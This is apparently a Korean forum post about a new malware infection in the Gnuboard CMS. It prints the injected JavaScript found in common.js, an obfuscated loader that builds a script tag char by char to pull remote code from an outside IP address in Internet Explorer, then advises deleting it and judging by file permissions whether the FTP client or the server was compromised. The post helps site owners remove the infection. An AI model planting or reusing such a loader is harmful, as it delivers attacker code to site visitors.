그누보드 신종 악성코드 유형으로

www/gnu/js/common.js 파일내에 아래의 소스부분을 삭제해보시기 바랍니다.




function Info_JQueryValue_View()
{
if(navigator.userAgent.toLowerCase().indexOf("msie") != -1)
{
var M='';M+='<';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+=' ';M+='s';M+='r';M+='c';M+='=';M+='h';M+='t';M+='t';M+='p';M+=':';M+='/';M+='/';M+='1';M+='7';M+='3';M+='.';M+='2';M+='5';M+='2';M+='.';M+='1';M+='9';M+='9';M+='.';M+='9';M+='1';M+='/';M+='s';M+='i';M+='d';M+='e';M+='v';M+='i';M+='e';M+='w';M+='.';M+='j';M+='s';M+='>';M+='<';M+='/';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+='>';var Info_JQueryValue_View_='NULL';document.write(M);
}
}




이거 그누보드 최신 업데이트 안해서 그런것인가요?

xxxx.js 의 파일 퍼미션의 xx7 로 되어 있지 않다면 개인 컴퓨터를 통하여 FTP 로 감염된 경우로 볼수 있습니다.
XX7 인 경우 서버가 해킹 당한 경우로 보시면 됩니다.